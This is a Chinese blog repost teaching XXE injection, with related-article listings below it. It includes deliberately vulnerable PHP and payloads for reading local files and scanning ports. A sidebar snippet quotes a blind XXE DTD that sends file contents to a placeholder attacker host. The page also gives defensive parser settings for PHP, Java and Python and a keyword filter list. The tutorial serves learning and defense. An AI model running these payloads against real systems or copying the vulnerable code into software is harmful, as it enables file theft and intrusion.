渗透之路基础 -- XXE注入漏洞

最新推荐文章于 2024-07-22 10:37:29 发布
最新推荐文章于 2024-07-22 10:37:29 发布
阅读量427 收藏 1
点赞数
文章标签: php python json
原文链接:http://www.cnblogs.com/r0ckysec/p/11532013.html
版权

XXE漏洞

XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。

类似于文件包含漏洞--通过加载XML文件并调用配置文件,来实现注入

造成漏洞的代码:

<?php
$xml=$_GET['x'];
$data=simplexml_load_file($xml);
var_dump($data);
?>

simplexml_load_file php解析外部实体须在 php << 5.5.38

文件任意读取

读取 file.xml 代码如下:

<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
    <!ENTITY file SYSTEM "file:///c:/config.ini">
]>
<x>&file;</x>
<!-- 引用外部实体 -->

1404622-20190917101905058-49914176.png

访问 http://192.168.80.128/test/xml/test.php?x=file.xml

1404622-20190917101913428-1604881053.png

端口扫描

读取 port.xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
    <!ELEMENT name ANY >
    <!ENTITY xxe SYSTEM "http://127.0.0.1:80">
]>
<root>
<name>&xxe;</name>
</root>

访问 http://192.168.80.128/test/xml/test.php?x=port.xml

没有报错,说明端口存在并且开放

1404622-20190917101923032-755100737.png

如果将端口改为不存在的端口 180

1404622-20190917101929466-586926155.png

访问 http://192.168.80.128/test/xml/test.php?x=port.xml

1404622-20190917101937896-2049018426.png

某CTF题

http://web.jarvisoj.com:9882/

1404622-20190917101944415-864142792.png

  • 返回信息为 json 格式

1404622-20190917101950106-1170914270.png

  • 然后 burp抓包分析

1404622-20190917101954955-1390838578.png

  • 尝试xml注入,抓包重发

1404622-20190917101959815-1176320444.png

XML后门的利用

php动态创建xml,植入后门

防御XXE攻击

使用开发语言提供禁用外部实体的方法

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

Python:

from lxml import etree

xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

过滤用户提交的XML数据

过滤关键词:<!DOCTYPE和<!ENTITY,或者,SYSTEM 和 PUBLIC。

不允许XML中包含有自己定义的DTD

https://www.cnblogs.com/miyeah/p/4526088.html

外部引入DTD文件

1404622-20190917102008301-2073544376.png

编写XML注入代码

1404622-20190917102012607-1171338497.png

访问 http://192.168.80.128/test/xml/test.php?x=xxe-dtd.xml

可以读取出文件信息达到文件读取利用

1404622-20190917102019071-1811696717.png

转载于:https://www.cnblogs.com/r0ckysec/p/11532013.html

b627074592
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用友 GRP-U8 Proxy XXE-SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
10-09 3549
用友GRP-U8 Proxy 存在SQL注入漏洞,攻击者可通过该漏洞获取服务器权限,详情点击了解更多。
33-3 XXE漏洞 - XXE外部实体注入(文件读取)
weixin_43263566的博客
04-02 334
这个XML文档看起来很简单,但实际上它包含了一种XML外部实体注入XXE)攻击。通过在DTD中定义恶意实体并在XML文档中引用它们,攻击者可以利用XXE漏洞来读取敏感文件、执行命令或进行其他恶意操作。实体可以在XML文档中被引用,类似于变量,在文档解析过程中会被替换为其定义的值。:这是DOCTYPE声明,用于指定XML文档的文档类型定义(DTD)。,但实际上它可以被定义为任何攻击者想要的内容,包括文件路径、命令等。:这是XML文档的声明部分,指定了XML版本和字符编码。:在DTD中定义了一个实体。
记一次XXE渗透实战
qq_43998932的博客
09-21 686
0x00、XXE是什么? XXE也就是XML外部实体注入攻击。 0x01、什么是XML呢? 1.XML 指可扩展标记语言(EXtensible Markup Language) 2.XML 是一种标记语言,很类似 HTML 3.XML 的设计宗旨是传输数据,而非显示数据 4.XML 标签没有被预定义。您需要自行定义标签。 5.XML 被设计为具有自我描述性。 6.XML 是 W3C 的推荐标准 0x03、XXE实体注入原理 有了XML实体,关键字’SYSTEM’会令XML解析器从URI中读取内容,并允许
[Web漏洞原理解析]XXE——XML实体注入
slismy的博客
01-23 290
白话Web漏洞 Author:Bell0ne_ XXE-实体注入一、XML是什么?二、使用步骤1.引入库2.读入数据总结 一、XML是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warni
【网络安全渗透测试基础入门必知必会】之XML外部实体注入(非常详细)零基础入门到精通,收藏这一篇就够了
jennycisp的博客
07-18 1387
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段文件XXE渗透与防御第1篇。本文主要讲解XML外部实体注入XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。
XXE注入
a3320315的博客
10-28 557
0x01 贴出源地址 Blind XXE详解与Google CTF一道题分析 0x02 贴出常用payload 一、Blind XXE 1、外部DTD (1)先在自己的服务器中加入下列DTD文件 xml.dtd <!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://myip:10001/?%file;'>"...
XML外部实体注入漏洞——XXE简单分析
未完成的歌~的博客
02-01 1590
前言: 前几天做了南邮 NJUPT CTF的几道题,感觉自己要学的的东西还有太多!今天借着比赛中的一道Web题 来系统的学习下XML外部实体注入(XML External Entity Injection) 题目:Fake XML cookbook 题目:Fake XML cookbook 平台暂时还未关闭,想要复现的抓紧了! 网址:https://nctf.x1c.club/challenges#Web ...
WEB安全之XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXE(XML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
[ vulhub漏洞复现篇 ] solr XML外部实体注入(CVE-2017-12629-xxe)
qq_51577576的博客
12-11 812
[ vulhub漏洞复现篇 ] solr XML外部实体注入(CVE-2017-12629-xxe) Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞XXE)和远程命令执行漏洞(RCE)。
漏洞复现】泛微E-Cology WorkflowServiceXml SQL注入漏洞
最新发布
失心少年
07-22 590
泛微E-Cology 是一款协同管理平台,旨在为中大型组织创建全新的高效协同办公环境。包含流程、门户、知识、人事、沟通、客户、项目、财务等 20多个功能模块。该系统WorkflowServiceXml接口处未对用户输入进行有效过滤,直接将其拼接进了SQL语句中,导致SQL注入漏洞,会导致数据泄露。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
XXE实体注入
qq_33557485的博客
05-05 383
1.XXE原理 XML被设计用来传输和存储数据。所以在网站中可以使用XML来读取或者写入数据。 如果用户可以控制XML代码,既可以利用XML读取任意文件。 2.php相关漏洞 php中有个函数:simplexml_load_string()。这个函数是将XML转化为对象,然后在php中使用。 3.注入小技巧 很多时候注入都是没有回显的,对于这类XXE来说,可以用XML将目标读取出来,然后...
xxe实体注入
qq_42307546的博客
01-25 1585
XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入 由于 xxe 漏洞主要是利用了 DTD 引用外部实体导致的漏洞,那么重点看下能引用哪些类型的外部实体。当 libXML <libxml2.9 才会造成外部注入漏洞XXE漏洞代码分析 &l
XXE 实体注入
guishengyx的博客
04-27 254
服务器因为你的传参发送数据包 我的传参为什么会让服务器发送数据包? 翻译网页功能如何实现 翻译网站直接替代我们去访问目标站点,然后获得内容后查询英文对应,然后处理完返回给用户 典型的SSRF:用户传参然后服务器去访问 SSRF危害: 访问内网(外紧内松) 隐藏攻击者(当做跳板机来躲避追踪) 攻击目标本机(dict:// file:// 读取文件)(有些网站对127.0.0.1的访问不设防) ...
WEB安全之:XXE 注入
f_carey的博客
07-08 564
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 XXE 注入1 XXE 注入定义2 XML 基础2.1 内部实体2.2 外部实体2.3 参数实体3 XXE 的危害4 XXE 利用方式4.1 有回显注入方式4.1.1 有回显测试语句4.1.2 有回显 Payload4.2 无回显注入方式4.2.1 无回显测试语句4.2.2 无回显 Payload 14.2.3.
XXE注入漏洞
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
09-03 3576
什么是XML 要想清楚XXE漏洞,首先要了解XML XML 可扩展标记语言(EXtensible Markup Language)。 它是一门用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型。 XML 很像HTML,但是标签没有被预定义,需要自行定义标签。它的文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。它的设计宗旨是传输数据,而不是显示数据。 php版本大于5.4.45的默认不解析外部实体 传参实体:有% 一般实体:无% xxe漏洞与ssrf漏洞相似 虽然场景不同,
XXE实体注入(超详细!)
bdfcfff77fa的博客
02-22 1208
程序分析:SYSTEM关键字令XML解析器读取了C:/phpStudy/scms/conn/conn.php里面的内容并进行base64编码赋值给了实体file,同时去访问了炮台上的1.xml,在1.xml会将实体file里面的值当成$_GET获得的id传参,去访问了2.php,在2.php里面将id传参的值记录下来,写进了3.txt文档里。访问http://59.63.200.79:8207/adminer.php ,输入账号,密码,库名进行登录,登录成功。将1.txt的东西,放入test这个变量。
web漏洞-xml外部实体注入(XXE)
rumil的博客
10-09 2229
XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题",也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
XXE漏洞深度解析与实战演练
本文档详细介绍了XXE(XML External Entity)漏洞的概念、危害、检测方法、利用技巧以及修复策略,并提供了多个实际案例进行演示。XXE漏洞主要发生在使用XML解析器处理用户输入的场景,攻击者可以通过构造恶意的XML...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值